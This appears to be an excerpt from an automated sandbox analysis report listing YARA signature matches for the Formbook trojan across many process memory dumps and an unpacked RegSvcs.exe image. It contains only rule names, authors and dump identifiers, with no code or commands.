              Source: 15.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000012.00000002.2628887806.0000000002A80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000012.00000002.2628887806.0000000002A80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000012.00000002.2628887806.0000000002A80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000022.00000003.1994918677.000000000169A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000022.00000003.1994918677.000000000169A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000022.00000003.1994918677.000000000169A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000008.00000003.1632670112.0000000001030000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000008.00000003.1632670112.0000000001030000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000008.00000003.1632670112.0000000001030000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000016.00000003.1778571483.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000016.00000003.1778571483.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000016.00000003.1778571483.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000022.00000003.1994440354.000000000169A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000022.00000003.1994440354.000000000169A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000022.00000003.1994440354.000000000169A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000016.00000003.1784873248.0000000000E34000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000016.00000003.1784873248.0000000000E34000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000016.00000003.1784873248.0000000000E34000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000025.00000002.2032446289.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000025.00000002.2032446289.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000025.00000002.2032446289.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000016.00000003.1781279846.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000016.00000003.1781279846.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000016.00000003.1781279846.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 0000001B.00000003.1914895579.0000000001A12000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 0000001B.00000003.1914895579.0000000001A12000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 0000001B.00000003.1914895579.0000000001A12000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000022.00000003.1993986799.00000000016C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000022.00000003.1993986799.00000000016C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000022.00000003.1993986799.00000000016C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000016.00000003.1779088648.0000000000DE7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000016.00000003.1779088648.0000000000DE7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000016.00000003.1779088648.0000000000DE7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 0000001B.00000003.1917625527.00000000019DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 0000001B.00000003.1917625527.00000000019DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 0000001B.00000003.1917625527.00000000019DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000022.00000003.1995504017.000000000169A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000022.00000003.1995504017.000000000169A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000022.00000003.1995504017.000000000169A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000016.00000003.1785265319.000000000378C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000016.00000003.1785265319.000000000378C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000016.00000003.1785265319.000000000378C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000016.00000003.1779323188.0000000000E15000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000016.00000003.1779323188.0000000000E15000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000016.00000003.1779323188.0000000000E15000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000016.00000003.1785169179.0000000000D7D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000016.00000003.1785169179.0000000000D7D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000016.00000003.1785169179.0000000000D7D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000008.00000003.1633266545.0000000000F8E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000008.00000003.1633266545.0000000000F8E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000008.00000003.1633266545.0000000000F8E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 0000001B.00000003.1913572826.00000000019E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 0000001B.00000003.1913572826.00000000019E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 0000001B.00000003.1913572826.00000000019E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000022.00000003.1995901696.0000000004154000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000022.00000003.1995901696.0000000004154000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000022.00000003.1995901696.0000000004154000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 0000001A.00000002.1823176871.0000000000FC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 0000001A.00000002.1823176871.0000000000FC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 0000001A.00000002.1823176871.0000000000FC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000008.00000003.1631433911.0000000000FEB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000008.00000003.1631433911.0000000000FEB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000008.00000003.1631433911.0000000000FEB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000008.00000003.1631393564.0000000000FBD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000008.00000003.1631393564.0000000000FBD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000008.00000003.1631393564.0000000000FBD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000022.00000003.1994684726.000000000170D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000022.00000003.1994684726.000000000170D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000022.00000003.1994684726.000000000170D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000011.00000002.2649074855.0000000010EA2000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_772cc62d Author: unknown
              Source: 00000008.00000003.1632049860.000000000102C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000008.00000003.1632049860.000000000102C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000008.00000003.1632049860.000000000102C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 0000001B.00000003.1916791732.00000000019B2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 0000001B.00000003.1916791732.00000000019B2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 0000001B.00000003.1916791732.00000000019B2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000016.00000003.1785668153.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000016.00000003.1785668153.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000016.00000003.1785668153.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000022.00000003.1995504017.00000000016D9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000022.00000003.1995504017.00000000016D9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000022.00000003.1995504017.00000000016D9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000016.00000003.1778617142.0000000000DD9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000016.00000003.1778617142.0000000000DD9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000016.00000003.1778617142.0000000000DD9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000013.00000002.1690629152.0000000000C70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000013.00000002.1690629152.0000000000C70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000013.00000002.1690629152.0000000000C70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000016.00000003.1784873248.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000016.00000003.1784873248.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000016.00000003.1784873248.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000008.00000003.1632049860.0000000000FEC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000008.00000003.1632049860.0000000000FEC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000008.00000003.1632049860.0000000000FEC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000019.00000002.1824428727.0000000000950000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000019.00000002.1824428727.0000000000950000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000019.00000002.1824428727.0000000000950000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000008.00000003.1633788753.0000000000FBC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000008.00000003.1633788753.0000000000FBC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000008.00000003.1633788753.0000000000FBC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000008.00000003.1631481618.0000000001018000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000008.00000003.1631481618.0000000001018000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000008.00000003.1631481618.0000000001018000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000022.00000003.1996380159.000000000166A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000022.00000003.1996380159.000000000166A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000022.00000003.1996380159.000000000166A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000008.00000003.1632478090.0000000001030000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000008.00000003.1632478090.0000000001030000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000008.00000003.1632478090.0000000001030000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 0000001B.00000003.1913693018.0000000001A3C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 0000001B.00000003.1913693018.0000000001A3C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 0000001B.00000003.1913693018.0000000001A3C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000008.00000003.1633303654.0000000003827000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000008.00000003.1633303654.0000000003827000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000008.00000003.1633303654.0000000003827000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000022.00000003.1995598062.00000000016DD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000022.00000003.1995598062.00000000016DD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000022.00000003.1995598062.00000000016DD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 0000001B.00000003.1914595785.0000000001A11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 0000001B.00000003.1914595785.0000000001A11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 0000001B.00000003.1914595785.0000000001A11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000008.00000003.1632707847.0000000000FEC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000008.00000003.1632707847.0000000000FEC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000008.00000003.1632707847.0000000000FEC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000020.00000002.1954404710.0000000000510000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000020.00000002.1954404710.0000000000510000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000020.00000002.1954404710.0000000000510000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000022.00000003.1993881319.000000000166B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000022.00000003.1993881319.000000000166B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000022.00000003.1993881319.000000000166B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000016.00000003.1779404808.0000000000E42000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000016.00000003.1779404808.0000000000E42000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000016.00000003.1779404808.0000000000E42000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000021.00000002.1954501729.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000021.00000002.1954501729.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000021.00000002.1954501729.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000022.00000003.1995831269.000000000163D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000022.00000003.1995831269.000000000163D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000022.00000003.1995831269.000000000163D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000022.00000003.1994589968.00000000016E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000022.00000003.1994589968.00000000016E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000022.00000003.1994589968.00000000016E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 0000001B.00000003.1914843943.0000000001A51000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 0000001B.00000003.1914843943.0000000001A51000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 0000001B.00000003.1914843943.0000000001A51000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000016.00000003.1778666606.0000000000E06000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000016.00000003.1778666606.0000000000E06000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000016.00000003.1778666606.0000000000E06000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000016.00000003.1785086182.0000000000E37000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000016.00000003.1785086182.0000000000E37000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000016.00000003.1785086182.0000000000E37000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000008.00000003.1632126525.0000000001062000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000008.00000003.1632126525.0000000001062000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 00000008.00000003.1632126525.0000000001062000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 0000001B.00000003.1917367387.00000000042CA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 0000001B.00000003.1917367387.00000000042CA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 0000001B.00000003.1917367387.00000000042CA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 0000000F.00000002.1666060455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 0000000F.00000002.1666060455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
              Source: 0000000F.00000002.1666060455.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
              Source: 00000022.00000003.1993929850.0000000001699000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
